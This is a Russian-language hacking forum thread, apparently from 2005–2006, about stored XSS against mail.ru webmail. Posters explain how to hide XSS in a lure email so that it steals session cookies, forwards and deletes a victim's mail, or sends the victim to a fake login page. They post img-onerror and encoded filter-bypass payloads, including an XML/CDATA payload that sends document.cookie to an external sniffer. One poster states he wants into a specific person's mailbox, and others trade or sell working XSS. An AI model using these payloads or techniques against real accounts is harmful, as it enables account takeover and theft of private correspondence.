Активная XSS на mail.ru

Discussion in 'Уязвимости Mail-сервисов' started by Dronga, 4 Dec 2005.

  1. Dronga

    Dronga ВАША реклама ТУТ!!

    Joined:
    1 Jul 2005
    Messages:
    575
    Likes Received:
    239
    Reputations:
    249
    Берёшь абсолютно любое видео на античате, из раздела XSS и на примере mail.ru.

    Всё о чём шла речь выше - это способы запустить свой скрипт в браузере жертвы. На практике делается так, отправляется письмо в котором маскируется XSS.. Пользователь получает письмо от некой дамы, например "Katrin", с непонятной темой "MRA"... Девушек то все любят, да и намеки в каждой фразе видят, времена такие.. Открывает и читает:
    А пока он читает, работает код из этого же письма... Всё зависит от фантазии злоумышленника.

    Что это может быть??? Да что угодно. Самое банальное, это отправить куки на сниффер и ручками их подменить, а потом спокойно, не вводя никаких паролей попасть в чужой ящик. Никаких знаний практически не нужно, а XSS можно узнать у более сведующих товарищей.

    Более продвинутым считается написание скриптов, которые всё сделают за тебя.. Говоря конкретно о mail.ru по собственному опыту: копия всех писем имеющихся в ящике + настройка пересылки всех входящих на твой ящик + удаление письма с сервера. Юзер прочтёт, а при попытке обновить/удалить/переслать увидит надпись "Сообщение удалено с сервера"... Теперь иди свищи и рассказывай, что было, вот только куда-то делось.. Это очень трудоёмкая работа, требующая определенных навыков в програмировании и понимание основ взаимодействия с веб-сервером (запросы, методы аутентификации).

    Самые творческие и авантюрные личности идут ещё дальше =) Они используя XSS, перемещают пользователя на поддельную страничку.. Мол произошла ошибка, сессия потеряна.. Страничка в мейловском дизайне, ничего подозрительного, реклама как обычно... После ввода пароля реально перекидывает обратно в ящик... Вот только введённые вами данные уже ушли к хакеру на мыло.

    А можно всё совместить =) Вопрос ваших знаний.
     
    #41 Dronga, 2 Aug 2006
    Last edited: 2 Aug 2006
    2 people like this.
  2. Kanick

    Kanick Elder - Старейшина

    Joined:
    6 Sep 2005
    Messages:
    59
    Likes Received:
    30
    Reputations:
    32
    Dronga, на Mail.ru разве нет защиты от CSRF?
     
  3. Dronga

    Dronga ВАША реклама ТУТ!!

    Joined:
    1 Jul 2005
    Messages:
    575
    Likes Received:
    239
    Reputations:
    249
    Если ничего не изменилось, то защита имеется, но очень убогая. Всё сводится к проверке кук и реферера. Куки есть, а подделать рефку средствами php не проблема. Единственное что, опционально имеется возможность запрета заходов с разных IP в рамках одной сессии.
     
    #43 Dronga, 2 Aug 2006
    Last edited: 2 Aug 2006
  4. AMbar

    AMbar New Member

    Joined:
    7 May 2006
    Messages:
    7
    Likes Received:
    1
    Reputations:
    0
    Drongo, нет-нет, теорию я то знаю, да и видео у меня есть про это, так вот как вообще заюзать сам вредоносный код, имею хсс в майле, можно подробнее
     
  5. steppenwolfe

    steppenwolfe New Member

    Joined:
    27 Aug 2006
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Отправил нижеследующее по аське Dronge, но пока ответа не дождался :(

    Хочу спросить по поводу XSS в Mail.Ru.

    Если я правильно понял, то вот такой вариант уже не катит:
    PHP:
    <img src="http://img.mail.ru/mail/ru/images/dumb.gif>"onerror=alert('1')> 
    <
    img src="http://img.mail.ru/mail/ru/images/dumb.gif>"onerror=alert(2)>
    <
    img src="http://img.mail.ru/mail/ru/images/dumb.gif >"onerror=alert('3')>
    <
    img src="http://img.mail.ru/mail/ru/images/dumb.gif    >"onerror=alert('4')>
    Я честно попробовал перебить это в десятичную кодировку, получилось что-то типа этого:
    PHP:
    &#60&#105&#109&#103&#032&#115&#114&#099&#061&#034&#104&#116&#116&#112
    &#058&#047&#047&#105&#109&#103&#046&#109&#097&#105&#108&#046&#114&#117
    &#047&#109&#097&#105&#108&#047&#114&#117&#047&#105&#109&#097&#103&#101
    &#115&#047&#100&#117&#109&#098&#046&#103&#105&#102&#062&#034&#111&#110
    &#101&#114&#114&#111&#114&#061&#97&#108&#101&#114&#116&#40&#39TEXT&#39
    &#41&#62
    Поперебирал разные комбинации, но - облом. Был бы у меня декодер - я бы и в шестнадцатиричной попробовал.

    Вот я и хочу узнать, это у меня глюки (я, правда, сначала тестил под SP-2, и только потом под незапатченным IE6) или эту дыру заделали?

    Может, хотя бы намекнёшь, в какую сторону чесать репу? Я, блин, даже ответ на секретный вопрос знаю, но юзать его нельзя - чел мониторит ящик каждый день, ну и я тоже хотел бы рядом пристроиться:)))
     
  6. Dronga

    Dronga ВАША реклама ТУТ!!

    Joined:
    1 Jul 2005
    Messages:
    575
    Likes Received:
    239
    Reputations:
    249
    Ну чтож... Продолжая демонстрировать интересные и не очень (кому как) способы обхода фильтра, выкладываю следующую XSS. Конечно же, в таком виде она уже не применима для @mail.ru, но...

    Code:
    <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:
    img=new Image();
    img.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;">]]>
    </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
    В основе данной XSS лежит то, что многие браузеры, в частности IE и Opera, парсят XML. Фильтр пропускал эту конструкцию потому что не видел в ней слова javascript =) А вот браузер видел.. Взяв справочник по XML ты легко разберешься что и почему =)
     
    2 people like this.
  7. Mаil2k

    Mаil2k Banned

    Joined:
    17 Sep 2006
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    Очень познавательно! Респект! Надо будет попробывать
     
    1 person likes this.
  8. Nowi4ok

    Nowi4ok Banned

    Joined:
    13 Dec 2005
    Messages:
    27
    Likes Received:
    0
    Reputations:
    -7
    вот запалнаю все как надо и код вставлаю а мне пишет Error in connect (SOCKET)

    4о делат ктонит потскажет
     
  9. _Pantera_

    _Pantera_ Характерне козацтво

    Joined:
    6 Oct 2006
    Messages:
    186
    Likes Received:
    356
    Reputations:
    109
    кажется бага уже прикрыта
     
  10. byblik

    byblik Elder - Старейшина

    Joined:
    1 Oct 2006
    Messages:
    108
    Likes Received:
    48
    Reputations:
    -5
    молодцы ребята mail.ru быстро работают
     
  11. HOT

    HOT New Member

    Joined:
    5 Dec 2006
    Messages:
    2
    Likes Received:
    0
    Reputations:
    -2
    А что если чувак пользуется оперой или мозилой.Как вы сбираетесь пиститЬ куки если он сохраняет их жезлом?
    В основном продвинутые админы мозилой пользуются а не ИЕ.
     
  12. maxxtor

    maxxtor Banned

    Joined:
    18 Dec 2006
    Messages:
    4
    Likes Received:
    0
    Reputations:
    -2
    10x [=
     
  13. Google00

    Google00 Member

    Joined:
    28 Dec 2006
    Messages:
    19
    Likes Received:
    5
    Reputations:
    0
    Значит так. Мне надо xss - любая(конешно кто щедрый и активную можно :) ). Бабла у меня нету и единственное что могу предложить это 3 шестизначки. Вот такие голимые у меня дела... вот.
    пишыте на ето: [email protected]
     
  14. re-arranged

    re-arranged New Member

    Joined:
    17 Nov 2006
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    ребят, так есть сейчас xss рабочая или ее уже давно прикрыли?
     
  15. roruda_semu

    roruda_semu New Member

    Joined:
    17 Dec 2005
    Messages:
    16
    Likes Received:
    4
    Reputations:
    -3
    eti xss ni rabotayet
     
  16. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    уже больше года прошло =d
     
  17. roruda_semu

    roruda_semu New Member

    Joined:
    17 Dec 2005
    Messages:
    16
    Likes Received:
    4
    Reputations:
    -3
    Green ya znayu etu realno ya hatil pisat sto noviy xss net katorit rabotayet :)
     
  18. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
    Есть, её за 5$ продают.+ недавно Грейт выкладывал.
     
    #58 Ksander, 29 Dec 2006
    Last edited: 29 Dec 2006
  19. roruda_semu

    roruda_semu New Member

    Joined:
    17 Dec 2005
    Messages:
    16
    Likes Received:
    4
    Reputations:
    -3
    :) tolka 5$ :) ,,, ni doroga ,, a besplatno net ?
     
  20. Google00

    Google00 Member

    Joined:
    28 Dec 2006
    Messages:
    19
    Likes Received:
    5
    Reputations:
    0
    Бесплатно НЕТ!!! :rolleyes: